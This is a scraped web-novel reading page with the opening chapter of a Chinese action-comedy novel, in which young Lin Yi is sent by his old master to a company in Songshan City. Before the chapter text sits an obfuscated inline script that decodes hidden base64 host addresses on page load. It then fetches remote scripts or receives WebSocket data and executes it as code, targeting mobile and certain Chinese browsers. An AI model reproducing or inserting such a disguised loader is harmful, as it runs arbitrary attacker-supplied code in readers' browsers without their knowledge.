笔趣阁

字:
关灯 护眼
笔趣阁 > 林逸楚梦瑶 > 第1章 神奇的任务
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第1章 神奇的任务

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
“这是你去北非的酬劳。”
  林老头从一块包裹的很好的破布中,小心翼翼的拿出了两张皱皱巴巴的百元大钞递给了一旁眼巴巴的看着他的林逸。
  林逸不明白,自己执行的任务是那么的危险,自己的敌人是那么的强大,委托人获得的利益是那么的丰厚,到头来自己的所得却是那么的少。
  老头子是从哪儿给自己接的这些极品任务啊?
  每次都是九死一生,拿到手的酬劳却是五十、一百,这还好,还有三块两块的时候……
  每每想起这些,林逸都想哭。
  接过自己用生命换来的二百块钱,林逸最想骂的就是,妈了个蛋的!
  虽然他是个孤儿,从小就没有妈。
  跟着把自己养大的林老头学了十五年的功夫,读了十五年的书,怎么也算是个文武全才了吧?
  放古代那也是文武双全的双榜状元了,却被当做力工一样的使唤……这日子什么时候是个头儿啊!
  听说城里面给人盖房子一年还能拿好几万呢,自己每天死去活来的,一年也不过千八百块……
  “老头子,你不会是耍我吧?二百块?我很怀疑你是不是在克扣我的酬劳?”
  林逸不止一次的怀疑过这件事儿了,可是老头子和他穿的一样吃的一样,又不像有钱人的样子。
  “有钱拿就不错了,你以为现在的钱是这么好赚的?”
  林老头翻了翻他的鼓泡眼儿,没好气的说道:“怎么?不想要?不想要就还给我,我好久没去村头王寡妇家的小吃部打牙祭了。”
  “……”
  林逸很想狂揍眼前这个瘦干瘪老头一顿,但是他知道,自己动手的结果就是被揍。
  林老头的功夫到底有多厉害,林逸自己也不知道。
  只知道他每次陪自己练功时,都没有使出全力。
  就在自己的功夫提升了一个档次时,却突然发现,老头子也提升了一个档次,自己依然是他的手下败将。
  “好了,这些年你也历练的差不多了,那一件大事,也差不多是时候了。”
  林老头眼皮都不抬一下,盘腿坐在炕上,吧唧吧唧的磕着面前的一碟茴香豆:“这个任务你做好了,一辈子就不愁吃喝了!”
  “真的假的?”
  林逸知道自己从三岁被老头子捡破烂时捡回来开始,就跟着老头子学功夫,学医术,学外面的知识,就是为了去做一件大事!
  可是林逸却很怀疑这个大事的酬劳究竟有没有老头子说的那么多,一个任务可以吃一辈子。
  “我什么时候骗过你?”
  林老头又扔进口中一枚茴香豆:“你去不去?不去我换人了?”
  “去,我当然去!”
  林逸心道,这么好的事儿,傻子才不去呢!
  一个任务可以吃一辈子,自己以后可就不用这么死去活来了。
  就算是龙潭虎穴,拼了也值了!
  “恩,那你去吧,你去松山市,鹏展集团,找一个叫楚鹏展的人,他会告诉你接下来要做什么。”
  林老头的嘴角划过一丝不易察觉的奸笑:“不过你可要想好了,一旦接下了这个任务,就一定要做下去,中途可不能退出。”
  “为什么?有危险还不让人跑路啊?”
  林逸可不是那种一根筋的人,明知道会死亡的事情可是坚决不做。
  “小逸啊,老子养你了十五年,供你吃,供你喝,给你买笔记本电脑,给你买3G网卡……”
  老头子眼睛一翻,喋喋不休的唠叨了起来:“让你做点儿事你就这么多问题,你别逼我!”
  “靠!”
  林逸听了老头子的话就气不打一处来:“前三年你养我,六岁开始就是我做饭,我劈柴,我编草鞋赚钱养你,你也别逼我!”
  “你半夜偷摸用电脑看什么,别以为我不知道!”
  老头子一瞪眼,说道:“这是你逼我说的!你还对着电脑……”
  “好吧……我去……我不跑路,行了吧?”
  林逸老脸一红,没想到自己做的这么隐秘的事情都被这老家伙察觉了,真他娘的丢脸。
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师